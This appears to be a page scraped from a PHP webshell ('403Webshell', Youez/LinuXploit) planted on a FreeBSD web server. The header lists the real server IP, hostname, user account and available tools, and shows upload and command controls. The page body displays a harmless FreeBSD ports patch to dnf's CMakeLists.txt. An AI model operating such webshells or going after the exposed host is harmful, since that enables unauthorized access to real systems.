403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.168
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/sysutils/dnf/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/sysutils/dnf/files/patch-CMakeLists.txt
--- CMakeLists.txt.orig	2020-06-02 09:51:52 UTC
+++ CMakeLists.txt
@@ -3,7 +3,7 @@ CMAKE_MINIMUM_REQUIRED (VERSION 2.4)
 
 INCLUDE (${CMAKE_SOURCE_DIR}/VERSION.cmake)
 
-SET( SYSCONFDIR /etc)
+SET( SYSCONFDIR ${CMAKE_INSTALL_PREFIX}/etc)
 SET( SYSTEMD_DIR /usr/lib/systemd/system)
 
 IF (NOT PYTHON_DESIRED)
@@ -25,7 +25,9 @@ MESSAGE(STATUS "Python install dir is ${PYTHON_INSTALL
 ADD_SUBDIRECTORY (dnf)
 ADD_SUBDIRECTORY (bin)
 ADD_SUBDIRECTORY (etc)
+if (FREEBSD_INSTALL_DOC)
 ADD_SUBDIRECTORY (doc)
+endif()
 ADD_SUBDIRECTORY (po)
 ENABLE_TESTING()
 ADD_SUBDIRECTORY (tests)

Youez - 2016 - github.com/yon3zu
LinuXploit